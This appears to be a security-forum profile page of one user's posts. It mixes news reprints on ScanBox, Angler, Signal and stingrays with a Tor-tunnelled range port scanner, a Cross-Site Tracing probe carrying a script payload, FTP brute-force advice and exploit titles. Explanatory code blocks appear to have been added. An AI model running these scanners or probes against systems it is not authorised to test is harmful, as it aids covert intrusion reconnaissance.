Aerosol
Active Members
Posts: 3453
Days Won: 22

Everything posted by Aerosol

  1. Aerosol

     Nichita

     Welcome. (Or, in your own words, welcome (back)!)
  2. Well done @Kronzy, let us know how much they paid you and whether you make the HOF.
  3. 1.1 released
     1.1 in attach, git updated. Kinda fast, but we just finished what we wanted to put in the release, and missed doing this by the deadline.
     Changelog:
     - added popup menu for Process page
     - added file properties dialog for Process page
     - added descriptions for more object types
     - added named pipes dialog (menu -> extras)
     - added information for IoCompletion object type, including structured object body dump
     - some code revision and corrections
     SHA1 for attached files:
     20436c56cbb40c3c0b0078b375ae6f8fe0723ab7 *WinObjEx64.chm
     6386213cabe7cca553b2a6eb20e06a147e159cce *WinObjEx64.exe
     Do not expect new versions soon, except maybe serious bugfixes if there are any.
     Download Source
  4. ScanBox is a framework in the form of a JavaScript file. Its function is to collect information about the visitor's system without infecting it. This information includes the last page the user was on before visiting the compromised website, the OS and language settings of the system, the screen width and height, the web browsers used by the victim, the geographical location, the security software in use, and the versions of programs like Java, Acrobat Reader, MS Office and Adobe Flash. ScanBox can also log the keystrokes the victim types inside the website under the attacker's control, which may include passwords and other sensitive information. All of this is then sent to a remote C&C server controlled by the attackers. ScanBox's goal is to collect information that will later be used to compromise specific targets.

     The ScanBox framework has been deployed on several websites belonging to disparate companies and organizations in different countries. The attackers were able to compromise each website and include code that loaded a malicious JavaScript file from a remote server. ScanBox is particularly dangerous because it does not require malware to be deployed to disk in order to steal information; the keylogging functionality does the same work by simply requiring the JavaScript code to be executed by the web browser. The framework also facilitates surveillance, enabling attackers to exploit vulnerabilities in visitors' systems by pushing and executing malware. ScanBox is designed as a modular, reusable JavaScript-based exploit kit. It allows a lesser number of sophisticated attackers to first compromise a website using basic attacks such as SQL injection or WordPress bugs and then set up a watering hole attack to infect the hundreds to thousands of victims who visit that website.

     Some of the recent attacks which used ScanBox are the following:

     Table 1: List of attacks
     Month identified   Country   Sector/Type         ScanBox domain
     August 2014        JP        Industrial sector   js.webmailgoogle.com
     September 2014     CN        Uyghur              code.googlecaches.com
     October 2014       US        Think tank          news.foundationssl.com
     October 2014       KR        Hospitality         qoog1e.com

     By analyzing the script used in these attacks, it has been found that the base code is pretty much the same and differs only in implementation. This shows that different attackers are using ScanBox as a tool for their attacks. The framework was altered according to the victims' browsers and other factors in every case. Researchers say that the changes may be the result of upgrades to the framework. The common codebase in all the attacks leads to the conclusion that the attackers share some resources in using this framework.

     Working
     Step 1: The basic step of the ScanBox framework is to configure the C&C server. This server collects and stores the information obtained from the compromised website.
     Figure 1: ScanBox framework for collecting data
     Step 2: The collected information is encrypted before being sent to the C&C server.
     Figure 2: Function for data encryption
     Step 3: After the encryption process, the following request is sent:
     Figure 3: Request produced after encryption
     Step 4: The encrypted data reaches the C&C server and is decrypted to obtain the original data. These pieces of information are the key to starting the attack.
     Figure 4: Decrypted data
     Figure 5: Working of ScanBox framework

     Plugins
     Several plugins are loaded as needed to extract the required information. They are selectively added to avoid raising suspicious alerts when the page loads. The following are some plugins used during the process:
     Pluginid 1: Lists the software installed on the system and checks whether the system is running any version of EMET (Enhanced Mitigation Experience Toolkit).
     Figure 6: Pluginid 1 code
     Pluginid 2: Determines Adobe Flash versions
     Pluginid 5: Determines Microsoft Office versions
     Pluginid 6: Enumerates Adobe Reader versions
     Pluginid 8: Lists Java versions
     Pluginid 21: Plants a keylogger inside the compromised website. It records every keystroke the person types in the website; the logs may include account passwords and other details. The recorded logs are sent to the corresponding command and control server, and the information is later used to launch an attack against that particular user. The keylogger feature of ScanBox lets the attacker collect data without loading malware from disk, so no malware removal tool will find it.
     Figure 7: Keylogger plugin code

     The plugins required to load on different browsers differ. An attacker should be well aware of the version and type of browser used by the victim; the plugins are loaded according to that requirement so that the desired result is obtained. The following is the list of plugins loaded per browser on code.googlecaches.com.

     Table 2: Plugins loaded per browser on code.googlecaches.com
     Plugin ID  Description                     Internet Explorer  Chrome  Firefox  Safari
     1          Software reconnaissance         Y                  N       N        N
     2          Browser plugin                  N                  Y       Y        Y
     3          Flash recon                     Y                  Y       Y        Y
     4          SharePoint recon                Y                  N       N        N
     5          Adobe PDF reader recon          Y                  N       N        N
     6          Chrome security plugins recon   N                  N       Y        N
     7          Java recon                      Y                  Y       Y        Y
     8          Internal IP recon               N                  Y       N        N
     9          JavaScript keylogger            Y                  Y       Y        Y

     It has been found that Google Chrome is less vulnerable to such attacks than the others on the list because it receives security updates at roughly 15-day intervals, which makes the attack a bit more difficult to carry out. The Aviator web browser built by WhiteHat Security also provides impressive privacy and security settings by default.

     Watering Hole Attack
     This type of attack is mainly targeted at businesses and organizations. Watering hole attacks drive the ScanBox framework. The attacker keeps an eye on the websites the victim visits frequently and infects those websites with malware. These attacks are hard to detect. Once the targeted victim enters the infected website, the malware finds a way into the victim's network or system. The dropped malware may be a Remote Access Trojan (RAT), which allows the attacker to access sensitive and personal information. The main goal of a watering hole attack is not to serve the maximum amount of malware to the system, but to exploit the websites frequently visited by the targeted victim.
     Figure 8: Watering hole working
     A watering hole attack can be carried out with the help of the ScanBox framework. In this method the JavaScript does the job and saves the attacker from using malware. This type of attack using ScanBox is much more efficient than using malware and cannot be detected by any malware removal tool. You can see the list of watering hole attacks which used ScanBox in Table 1.

     Precautions
     Regular software updating: Timely upgrades of software reduce the exposure to such attacks.
     Vulnerability shielding: Helps to scan suspicious traffic and any deviation from the normal protocols used.
     Network traffic detection: Even though hackers find different ways to access the information, the traffic generated by the final malware in communicating with the C&C server remains consistent. Identifying these paths helps to contain the effect of such attacks.
     Threat intelligence: A subscription with a prominent threat intelligence provider will help you track down all the command and control servers that it connects to. These C&C servers can be fed to proxy or perimeter devices to see whether any successful communication has been established.
     Least privilege: The concept of least privilege has to be implemented for all users who log on to the machine. Admin privileges have to be limited to certain users only.
     Next generation firewall: A next generation firewall can detect such attacks more easily, as it has an inbuilt sandbox.
     SIEM: By using a SIEM solution, security administrators will be able to monitor all the traffic by capturing the logs. It gives a holistic view of what is happening on your network with a few clicks on a single dashboard.

     Conclusion
     From the detailed analysis of the ScanBox framework, we can say that it could be very dangerous if the user is not cautious. Thorough monitoring and analysis of computers and the network should keep such attacks bolted down to an extent.

     References
     Cyber security updates: October 2014
     ScanBox Framework - Krebs on Security
     AlienVault Open Threat Exchange blog: https://www.alienvault.com/open-threat-exchange/blog/ScanBox-a-reconnaissance-framework-used-on-watering-hole-attacks
     AlienVault discovered Watering Hole attacks using Scanbox for reconnaissance - Security Affairs
     Source
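The post above says the attackers inject a remote script include into a compromised site and points at the four ScanBox domains in Table 1, all of them Google look-alikes. The following is an added example, not ScanBox's code and not from the original article: it parses a page's HTML, lists every script loaded from a host other than the page's own, and classifies each host as a known ScanBox indicator (Table 1), an allowed CDN, a Google look-alike (digit homoglyphs folded, then edit distance against "google"), or an unknown external host. ALLOWED_HOSTS, the sample page and its domains are assumptions constructed for the example; only the four indicator domains come from the post.

```python
"""Find remotely sourced <script> tags in a page and classify their hosts.
Added example for the watering-hole/ScanBox discussion; it is not ScanBox's
code and not from the original article. Indicators are the four domains in
Table 1; ALLOWED_HOSTS and SAMPLE_PAGE are constructed for this example."""
from html.parser import HTMLParser
from urllib.parse import urlsplit

SCANBOX_HOSTS = {                     # Table 1 of the post
    "js.webmailgoogle.com",
    "code.googlecaches.com",
    "news.foundationssl.com",
    "qoog1e.com",
}
ALLOWED_HOSTS = {"cdn.example.org"}   # assumption: the site's own script CDN

# Digits commonly swapped for letters in look-alike domains.
DIGIT_HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})


def levenshtein(a, b):
    """Edit distance between two strings (classic dynamic-programming version)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def looks_like_google(host):
    """True for a registered domain that is not google.com but reads as 'google'
    after folding digit homoglyphs (qoog1e -> qoogle) or sits within edit distance 2."""
    labels = host.lower().split(".")
    if len(labels) < 2 or ".".join(labels[-2:]) == "google.com":
        return False
    sld = labels[-2].translate(DIGIT_HOMOGLYPHS)
    return "google" in sld or levenshtein(sld, "google") <= 2


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in the document."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)


def classify(host):
    if host in SCANBOX_HOSTS:
        return "known-scanbox"
    if host in ALLOWED_HOSTS:
        return "allowed"
    if looks_like_google(host):
        return "google-lookalike"
    return "unknown-external"


def audit_page(html, page_host):
    """Return (src, host, verdict) for every script loaded from another host."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        host = urlsplit(src).hostname   # None for relative paths like /static/app.js
        if host and host.lower() != page_host.lower():
            findings.append((src, host.lower(), classify(host.lower())))
    return findings


# Constructed sample page: one same-host script, one relative script, the CDN,
# a Table 1 domain as a protocol-relative include, a look-alike, and a stranger.
SAMPLE_PAGE = """<html><head>
<script src="https://www.example.org/main.js"></script>
<script src="/static/app.js"></script>
<script src="https://cdn.example.org/jquery.js"></script>
<script type="text/javascript" src="//code.googlecaches.com/js/c.js"></script>
<script src="http://cdn.g00gle-cdn.net/a.js"></script>
<script src="https://www.gstatic.com/x.js"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for src, host, verdict in audit_page(SAMPLE_PAGE, "www.example.org"):
        print(f"{verdict:17} {host:25} {src}")
```

Run it against saved copies of your own landing pages (the ones a watering hole would target) and treat any "known-scanbox" or "google-lookalike" verdict as an injected include until proven otherwise; "unknown-external" is the list to reconcile against what the site is supposed to load.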
  5. The sanctity of Apple iMessage end-to-end encryption has been challenged by white hats who in 2013 reverse engineered the protocol behind it, revealing that Apple controls the key infrastructure and could, in turn, be compelled to turn over messages via government order. CEO Tim Cook denied those charges last September in an interview, but nonetheless, confidence in the security of messages sent over iMessage hasn’t been 100 percent since. Researcher Moxie Marlinspike’s Open Whisper Systems today released version 2.0 of the free Signal app for Apple iOS, which now adds end-to-end encrypted messaging to the encrypted voice calling introduced last July with Signal 1.0. The private messaging support for iPhone is free and open source—and not the last step for Marlinspike, who is also responsible for RedPhone, an app that encrypts calls on the Android platform, and TextSecure for Android, a private text and chat app that is at the heart of today’s Signal 2.0 release for the iPhone. “We’re going to unify TextSecure and RedPhone into Signal on Android, release a desktop version of Signal, and keep working to push the envelope of secure protocols and private communication,” Marlinspike said of his planned product road map. For now, the availability of Signal 2.0 for iOS brings a measure of privacy and secure communication that’s been in question since the QuarksLab report of 2013. “It’s technically possible that someone in control of Apple’s servers could intercept your communication,” Marlinspike said, adding that Signal 2.0 now allows iPhone users to communicate privately with users on the Android platform. The protocol behind Signal 2.0 also supports forward secrecy, which essentially generates a new encryption key for each message, meaning that if a key were cracked in the future, not all messages would be in danger.

     Signal 2.0, Marlinspike also said, allows users to verify each other’s respective encryption keys, meaning that it would be easy to detect if an attacker was sitting in a man-in-the-middle position intercepting traffic between endpoints. For now, both ends of a conversation require Signal to be installed in order to assure secure communication, Marlinspike said. The simplicity of Signal should remove any impediment for privacy conscious users. The app uses the phone’s existing phone number and address book and does not require a separate log-in or authentication mechanism to manage. Users are able to send encrypted group messages (text, video, photos) and make encrypted phone calls worldwide without extra charges, Marlinspike said. “We cannot hear your conversations or see your messages, and no one else can either. No exceptions. You can even tap and hold on a contact’s name to see advanced identity verification options,” says Signal 2.0’s product description. “Everything in Signal is always end-to-end encrypted and painstakingly engineered in order to keep your communication safe.” The source code is available on GitHub for inspection, as well, Marlinspike said. Source
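The article names two properties without showing them: forward secrecy (a fresh key per message, so one cracked key does not expose the rest) and out-of-band key verification to catch a man-in-the-middle. The block below is an added illustration, not Signal's code and not the Double Ratchet the app actually uses: it models the per-message keys with a one-way HMAC-SHA256 chain and shows that an attacker who steals the chain state after message N can recompute later keys but none of the earlier ones, then compares identity-key fingerprints the way the "tap and hold" check does. The identity keys, root key and labels are constructed stand-ins (real identity keys are Curve25519 public keys).

```python
"""Forward secrecy and key verification, illustrated.

Added example; this is not Signal's code and not the Double Ratchet. A
minimal symmetric KDF chain (HMAC-SHA256) stands in for the per-message
key schedule, and a SHA-256 fingerprint stands in for the app's identity
verification screen. Keys used below are constructed stand-ins."""
import hashlib
import hmac

MK_LABEL = b"\x01"   # label for the per-message key (assumed constant)
CK_LABEL = b"\x02"   # label for the next chain key (assumed constant)


def ratchet(chain_key):
    """One chain step: derive this message's key and the next chain key.
    HMAC is one-way, so holding chain key N yields keys N, N+1, ... but not N-1."""
    message_key = hmac.new(chain_key, MK_LABEL, hashlib.sha256).digest()
    next_chain_key = hmac.new(chain_key, CK_LABEL, hashlib.sha256).digest()
    return message_key, next_chain_key


def derive_message_keys(chain_key, count):
    """Derive `count` successive message keys; return them and the final chain key."""
    keys = []
    for _ in range(count):
        mk, chain_key = ratchet(chain_key)
        keys.append(mk)
    return keys, chain_key


def forward_secrecy_demo(root_key, total, stolen_after):
    """The sender derives `total` keys. An attacker who steals the chain key
    after message `stolen_after` can recompute every later key but none of
    the earlier ones: `exposed[i]` says whether message i's key leaked."""
    all_keys, _ = derive_message_keys(root_key, total)
    _, stolen_chain_key = derive_message_keys(root_key, stolen_after)
    attacker_keys, _ = derive_message_keys(stolen_chain_key, total - stolen_after)
    exposed = [k in attacker_keys for k in all_keys]
    return {"exposed": exposed,
            "later_keys_match": attacker_keys == all_keys[stolen_after:]}


# --- key verification (the "tap and hold on a contact's name" check) ---

def fingerprint(identity_key):
    """Human-comparable fingerprint of an identity key: 60 hex chars in groups of 5."""
    digest = hashlib.sha256(identity_key).hexdigest()[:60]
    return " ".join(digest[i:i + 5] for i in range(0, 60, 5))


def verified_out_of_band(fp_alice_sees_for_bob, fp_bob_reads_from_his_phone):
    """Alice and Bob compare fingerprints over a second channel (in person, voice).
    A man-in-the-middle who substituted his own key makes the strings differ."""
    return hmac.compare_digest(fp_alice_sees_for_bob, fp_bob_reads_from_his_phone)


if __name__ == "__main__":
    ROOT = bytes(32)                                   # constructed root key
    print(forward_secrecy_demo(ROOT, total=5, stolen_after=3))
    bob_key, mitm_key = b"bob-identity-key", b"mallory-identity-key"   # stand-ins
    print("honest:", verified_out_of_band(fingerprint(bob_key), fingerprint(bob_key)))
    print("mitm:  ", verified_out_of_band(fingerprint(mitm_key), fingerprint(bob_key)))
```

The chain only protects the past: once the attacker holds a chain key, everything after it is derivable, which is why the real protocol additionally mixes in fresh Diffie-Hellman output to heal after a compromise. The fingerprint comparison is only as good as the second channel it is read over.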
  6. Attackers behind the Angler Exploit Kit have added a tweaked version of an exploit for a patched Internet Explorer use-after-free vulnerability. Microsoft patched the vulnerability (MS14-056) in last October’s round of Patch Tuesday updates but that hasn’t stopped attackers from adding the vulnerability to the exploit toolkit. Similar to exploits disclosed in October, the sample Angler is using has been modified to bypass IE’s mitigation technology MEMPROTECT. According to Dan Caselden, a staff research scientist at FireEye who blogged on Friday about the vulnerability being included in Angler, this one is a use after free with MSHTML!CTitleElement that MEMPROTECT was not originally supposed to mitigate. Caselden claims the attack angle is interesting on its own because it focuses on IE deployments that use MEMPROTECT – introduced in July 2014 – but added that the vulnerability also cements the idea that attackers remain interested in compromising IE, especially against users running nearly five-month-old versions of it. Still, the use after free is not a generic exploit – some of its techniques weren’t necessary, Caselden adds – and going forward attackers will still have to find their way around the MEMPROTECT technology. “Some of the employed techniques (particularly the modified garbage collection routine) were not necessary,” Caselden wrote, “So in the future, exploit authors will need to find a reliable way around the delayed free, or bugs with another object that falls outside of the CMemoryProtector’s domain.” Chinese researchers with Keen Team (a/k/a k33nteam) first talked about how (.PDF) to exploit a use after free vulnerability against MEMPROTECT at the Taiwanese security conference Hitcon X over the summer and went on to describe how it bypasses memory protection and isolated heap in Windows 8.1 shortly after the bug was patched by Microsoft, in a blog entry last October.

     Caselden gets much deeper into the exploit and points out the similarities between k33nteam’s proof of concept and the Angler sample on FireEye’s blog. For example, unlike the October exploit, this one can also optionally serve up a Flash zero day (CVE-2015-0313) – one of the three that plagued the Adobe software last month – that was also previously seen being used by Angler. Microsoft introduced MEMPROTECT, or MemoryProtection, in a July 2014 patch for IE and while the heap mitigation technology isn’t failsafe, it was thought to be effective against use after free vulnerabilities. For a short period it seemed as if the move would curb the number of IE exploits spotted in the wild, as attackers wouldn’t have to reuse dated IE use after free exploits. Naturally attackers were able to come up with ways around this. Attackers have long had it out for Microsoft’s Internet Explorer and continue to take old, since-patched exploits and add them to their exploit kits just to see what sticks. In January attackers added a nasty, previously unknown Flash zero day that targeted IE on Windows 7 and 8 to the kit. An analysis of Angler last month called it the most sophisticated kit on the market, namely because it’s been the fastest to integrate newly released zero days and because its obfuscation is reportedly at the top of its game. Source
  7. They'll get off anyway, because they did nothing illegal. As for the "they were greedy" part, I think everyone would have done the same...
  8. For years the government has kept mum about its use of a powerful phone surveillance technology known as a stingray. The Justice Department and local law enforcement agencies insist that the only reason for their secrecy is to prevent suspects from learning how the devices work and devising methods to thwart them. But a court filing recently uncovered by the ACLU suggests another reason for the secrecy: the fact that stingrays can disrupt cellular service for any phone in their vicinity—not just targeted phones—as well as any other mobile devices that use the same cellular network for connectivity as the targeted phone. Civil liberties groups have long asserted that stingrays are too invasive because they can sweep up data about every phone in their vicinity, not just targeted phones, and can interfere with their calls. Justice Department and local law enforcement agencies, however, have refused to confirm this or answer other questions about the tools. But in the newly uncovered document (.pdf)—a warrant application requesting approval to use a stingray—FBI Special Agent Michael A. Scimeca disclosed the disruptive capability to a judge. “Because of the way, the Mobile Equipment sometimes operates,” Scimeca wrote in his application, “its use has the potential to intermittently disrupt cellular service to a small fraction of Sprint’s wireless customers within its immediate vicinity. Any potential service disruption will be brief and minimized by reasonably limiting the scope and duration of the use of the Mobile Equipment.” The document was previously sealed and only came to light after the defense attorney for a defendant in the case filed a motion last year to dismiss evidence collected by the stingray.
It’s the first time the ACLU has seen the FBI acknowledge the stingray’s disruptive capabilities and raises a number of questions about the nature of the disruption and whether the Federal Communications Commission knew about it when it certified the equipment. “We think the fact that stingrays block or drop calls of cell phone users in the vicinity should be of concern to cell service providers, the FCC, and ordinary people,” says Nate Wessler staff attorney with the ACLU’s Speech, Privacy, and Technology Project. “If an emergency or important/urgent call (to a doctor, a loved one, etc.) is blocked or dropped by this technology, that’s a serious problem.” Stingrays are mobile surveillance systems the size of a small briefcase that impersonate a legitimate cell phone tower in order to trick mobile phones and other mobile devices in their vicinity into connecting to them and revealing their unique ID and location. Stingrays emit a signal that is stronger than the signal of other cell towers in the vicinity in order to force mobile phones and other devices to establish a connection with them and reveal their unique ID. Stingrays can then determine the direction from which the phone connected with them, data that can then be used to track the movement of the phone as it continuously connects to the fake tower. Although stingrays are designed to recognize 911 calls and let them pass to legitimate cell towers without connecting to the stingray, the revelation from the FBI agent raises the possibility that other kinds of emergency calls not made to 911 may not get through. Law enforcement agencies around the country have been using variations of the stingray since the mid-90s to track the movement of suspects in this way. The technology is used by the FBI, the Secret Service, the U.S. Marshals Service, Customs and Border Patrol agents and the Drug Enforcement Agency as well as local law enforcement agencies in more than a dozen states. 
     But the secrecy around their use has been extreme, due in part to non-disclosure agreements that law enforcement agencies sign with the companies that make stingrays.

     Stingrays Cloaked in Secrecy
     Authorities in several states have been caught deceiving judges and defense attorneys about how they use the controversial technology or have simply used the devices without obtaining a warrant in order to avoid disclosing their use to a court. In other cases they have withheld information from courts and defense attorneys about how the stingrays work, refraining from disclosing that the devices pick up location data on all systems in their vicinity, not just targeted phones. Law enforcement agencies have even gone so far as to intervene in public records requests to prevent the public from learning about the technology. The revelation in the court document is therefore significant and also begs the question: Who else knew about this capability and for how long? The Federal Communications Commission is responsible for certifying equipment that operates on radio frequencies to make sure that devices comply with certain technical standards and do not cause radio interference. If the companies that make stingrays failed to disclose the disruption of service to the federal agency, it would mean the devices had potentially been approved under false pretenses. The Harris Corporation in Florida—the leading maker of stingrays for law enforcement in the U.S. and an aggressive proponent of secrecy around their use—has already been singled out for a questionable statement the company made to the FCC in a 2010 email. In the correspondence, a Harris representative told the FCC that the technology was used by law enforcement only “in emergency situations.” But according to records the ACLU obtained from the police department in Tallahassee, Florida, in nearly 200 cases that the equipment was used since 2007 only 29 percent of these involved an emergency.
     Stingrays are regularly used in day-to-day criminal investigations to track suspected drug dealers, bank robbers and others. The FCC certified stingray equipment from Harris in April 2011 and March 2012. Asked whether the company disclosed the stingray’s disruptive capabilities to the FCC when it sought certification, an FCC official told WIRED, “We can’t comment on how the devices operate because that information is confidential in accordance with the FCC’s application process.” She said Harris had specifically “requested confidentiality in the application process.” She also said that if “wireless customers experiencing unexplained service disruptions or interference” report it to the FCC, the agency will “investigate the causes.”

     How Stingray Disruption Works
     The case in which the FBI disclosed the service disruption is ongoing and involves a defendant named Claude Williams who was suspected of participating in a string of armed bank robberies. In July 2012, the FBI’s Scimeca submitted an application for a warrant to use a stingray to track Williams’s phone. Although Scimeca was seeking authorization to use a stingray, he referred to it alternatively as mobile pen register and trap and trace equipment in his application. The nomenclature is important because the ACLU has long accused the government of misleading judges by using this term. Pen registers record the numbers dialed from a specific phone number, while trap and trace devices record the numbers that dial into a particular number. But stingrays are used primarily to track the location and movement of a device. Although Scimeca disclosed to the magistrate that the equipment could disrupt phone service, he didn’t elaborate about how the disruption might occur. Experts suspect it has something to do with the “catch-and-release” way stingrays work.
     For example, once the stingray obtains the unique ID of a device, it releases it so that it can connect to a legitimate cell tower, allowing data and voice calls to go through. “As each phone tries to connect, [the stingray] will say, ‘I’m really busy right now so go use a different tower. So rather than catching the phone, it will release it,” says Chris Soghoian, chief technologist for the ACLU. “The moment it tries to connect, [the stingray] can reject every single phone” that is not the target phone. But the stingray may or may not release phones immediately, Soghoian notes, and during this period disruption can occur. Disruption can also occur from the way stingrays force-downgrade mobile devices from 3G and 4G connectivity to 2G to get them to connect and reveal their unique ID and location. In order for the kind of stingray used by law enforcement to work, it exploits a vulnerability in the 2G protocol. Phones using 2G don’t authenticate cell towers, which means that a rogue tower can pass itself off as a legitimate cell tower. But because 3G and 4G networks have fixed this vulnerability, the stingray will jam these networks to force nearby phones to downgrade to the vulnerable 2G network to communicate. “Depending on how long the jamming is taking place, there’s going to be disruption,” says Soghoian. “When your phone goes down to 2G, your data just goes to hell. So at the very least you will have disruption of internet connectivity. And if and when the phones are using the stingray as their only tower, there will likely be an inability to receive or make calls.”

     “A Grave Threat to Privacy”
     Concerns about the use of stingrays are growing. Last week, Senator Bill Nelson (D—Florida) sent a letter to the FCC calling on the agency to disclose information about its certification process for approving stingrays and any other tools with similar functionality.
Nelson asked in particular for information about any oversight put in place to make sure that use of the devices complies with the manufacturer’s representations to the FCC about how the technology works and is used. Nelson also raised concerns about their use in a remarkable speech on the Senate floor. The Senator said the technology “poses a grave threat to consumers’ cellphone and Internet privacy,” particularly when law enforcement agencies use them without a warrant. He also noted that invasive devices like the stingray will inevitably force lawmakers to come up with new ways to protect privacy. His combative speech marks the first time a lawmaker has called out the controversial technology in the public chamber. But his speech was also remarkable for another reason: Nelson’s state of Florida is home to the Harris Corporation, and the company is his second biggest campaign donor. Source
  9. Has it never happened to you that it shuts down and does a "Factory reset"? It happened to me 5 times in 3 years. Plus, it's a bit rough with apps if you buy it to play games, but otherwise, as a phone, it's OK.
  10. I keep thinking: when these guys get bored they go into other people's Facebook to see what they're saying to mom, dad or their girlfriend (I bet they laugh their heads off at some of them). Anyway, let this be a lesson for those who think Facebook is a 100% private way of socializing.
  11. Well, let's take a look at: Test antivirus software for Windows 7 - December 2014 | AV-TEST. As you can all see: the Avast Free version is better than the AVG Internet Security version (that says it all); as for the free version, pathetic at the very least...
  12. FPD really can be considered a level-1 information-gathering vulnerability (even though it looks insignificant), because it shows you the path and the FTP user; a small brute-force and you can get access. More about FPD here -> Full Path Disclosure - Hakipedia. Sorry I'm slow to reply, but I'm working on something... So J, that is the path; you don't brute-force the path, you brute-force the user. @Webz there's no $$$$ to be had, man, it's just FPD.
  13. It's nothing special, but I posted it because it was on a Toshiba subdomain.
  14. # tmap 0.1
      # Coded by TheKingOf9x <AT> yandex . com
      # Fast multi-threaded port scanner which tunnels through TOR.
      # Depends on the PySocks library: https://github.com/Anorov/PySocks
      # And of course TOR: apt-get install tor
      #
      # Do not use hostnames, may leak DNS info. Only use IP addresses.
      #
      # Not happy with the Privoxy + TOR (exit relay only) + nmap config. I made this.
      #
      # Usage:
      # python tmap.py

      import sys
      import socks
      import datetime
      import threading

      # Serialises screen/log output from the scanner threads. (The original used a
      # Semaphore(1) and released it in a `finally` even when it had never been
      # acquired, which silently let several threads through at once.)
      lock = threading.Lock()

      # Port of TOR server
      TOR_PORT = 9050

      # Timeout. Experiment with this.
      TIMEOUT = 20

      # Port list to scan, amend at will
      ports = (21, 22, 23, 80, 443, 1433, 3306, 8080)


      def main():
          if len(sys.argv) < 3:
              print("\033[92m\n\t\t\ttmap 0.1\n\nFast multi-threaded port scanner which tunnels through TOR.\n\n\033[0m")
              print("Single host scan:\npython " + sys.argv[0] + " -s 192.168.0.1\n")
              print("/24 (Class C) range scan:\npython " + sys.argv[0] + " -r 192.168.0\n")
              print("List scan:\npython " + sys.argv[0] + " -l IPlist.txt\n")
              sys.exit(0)
          scan_type = sys.argv[1]
          parameter = sys.argv[2]
          filename = datetime.datetime.now().strftime("%H:%M_%d-%m-%y.tmap")
          try:
              log = open(filename, "a")
          except OSError:
              log = None  # keep scanning, just without a log file
          if scan_type == "-s":
              host_scan(parameter, log)
          elif scan_type == "-r":
              range_scan(parameter, log)
          elif scan_type == "-l":
              list_scan(parameter, log)
          else:
              sys.exit(1)


      # main connect function: one TCP connect through the local TOR SOCKS5 port
      def connect(ip, port, log):
          s = socks.socksocket()
          s.set_proxy(socks.SOCKS5, 'localhost', TOR_PORT)
          s.settimeout(TIMEOUT)
          try:
              s.connect((ip, port))
          except Exception:
              return  # closed/filtered/timeout: print nothing
          finally:
              s.close()
          output = ip + ":" + str(port)
          with lock:  # lock/unlock to clean up screen output
              print(output)
              if log is not None:
                  log.write(output + "\n")
                  log.flush()


      def scan_ports(ip, log):
          for port in ports:
              threading.Thread(target=connect, args=(ip, port, log)).start()


      def host_scan(ip, log):
          scan_ports(ip.strip(), log)


      def range_scan(ip, log):
          ip = ip.strip()
          for i in range(1, 255):
              scan_ports(ip + "." + str(i), log)


      def list_scan(parameter, log):
          try:
              f = open(parameter, 'r')
          except OSError:
              print("Could not open file: " + parameter)
              sys.exit(1)
          with f:
              for ip in f:
                  scan_ports(ip.strip(), log)


      if __name__ == '__main__':
          main()
      Download Source
  15. #!/usr/bin/env python3
      # Cross-Site Tracer by 1N3 v20150224
      # https://crowdshield.com
      #
      # ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing.
      # For more robust mass scanning, create a list of domains or IP addresses to iterate
      # through by running: for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;
      #
      # USAGE: xsstracer.py <IP/host> <port>
      #
      import socket
      import sys


      class bcolors:
          HEADER = '\033[95m'
          OKBLUE = '\033[94m'
          OKGREEN = '\033[92m'
          WARNING = '\033[93m'
          FAIL = '\033[91m'
          ENDC = '\033[0m'
          BOLD = '\033[1m'
          UNDERLINE = '\033[4m'


      def main(argv):
          if len(argv) <= 2:
              print(bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 v20150224" + bcolors.ENDC)
              print(bcolors.OKBLUE + "+ -- --=[" + bcolors.UNDERLINE + "https://crowdshield.com" + bcolors.ENDC)
              print(bcolors.OKBLUE + "+ -- --=[usage: %s <host> <port>" % (argv[0]) + bcolors.ENDC)
              sys.exit(0)
          target = argv[1]     # SET TARGET
          port = int(argv[2])  # SET PORT
          # TRACE echoes the request back, so the <script> placed in a header shows up
          # in the response body if the server allows the method. HTTP header lines end
          # with CRLF and a blank line; the original sent bare "\n", which strict
          # servers reject, so the check could miss a vulnerable host.
          request = ("TRACE / HTTP/1.1\r\n"
                     "Test: <script>alert(1);</script>\r\n"
                     "Host: " + target + "\r\n"
                     "Connection: close\r\n"
                     "\r\n")
          print("")
          print(bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 ")
          print(bcolors.OKBLUE + "+ -- --=[https://crowdshield.com")
          print(bcolors.OKBLUE + "+ -- --=[Target: " + target + ":" + str(port) + bcolors.ENDC)
          s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
          s.settimeout(3.0)  # set before connect so the connect itself also times out
          result = s.connect_ex((target, port))
          if result == 0:
              s.sendall(request.encode())
              try:
                  data = s.recv(4096).decode("latin-1")
              except socket.timeout:
                  data = ""
              if "alert" in data.lower():
                  print(bcolors.FAIL + "+ -- --=[Site vulnerable to XST!" + bcolors.ENDC)
                  print("")
                  print(bcolors.WARNING + data + bcolors.ENDC)
              else:
                  print(bcolors.OKGREEN + "+ -- --=[Site not vulnerable to XST!" + bcolors.ENDC)
                  print("")
          else:
              print(bcolors.WARNING + "+ -- --=[Port is closed!" + bcolors.ENDC)
          s.close()


      if __name__ == "__main__":
          main(sys.argv)
      Download Source
  16. WordPress Calculated Fields Form 1.0.10 SQL Injection
      WordPress WP All 3.2.3 Shell Upload
      WordPress Photocrati Theme 4.x.x SQL Injection
      WordPress Newsletter 2.6.x / 2.5.x Open Redirect
      WordPress Max Banner Ads 1.9 Cross Site Scripting
      WordPress Ya'aburnee / Dignitas Privilege Escalation
      WordPress Contact Form DB 2.8.29 Cross Site Request Forgery
  17. #################################################################################################################
[+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
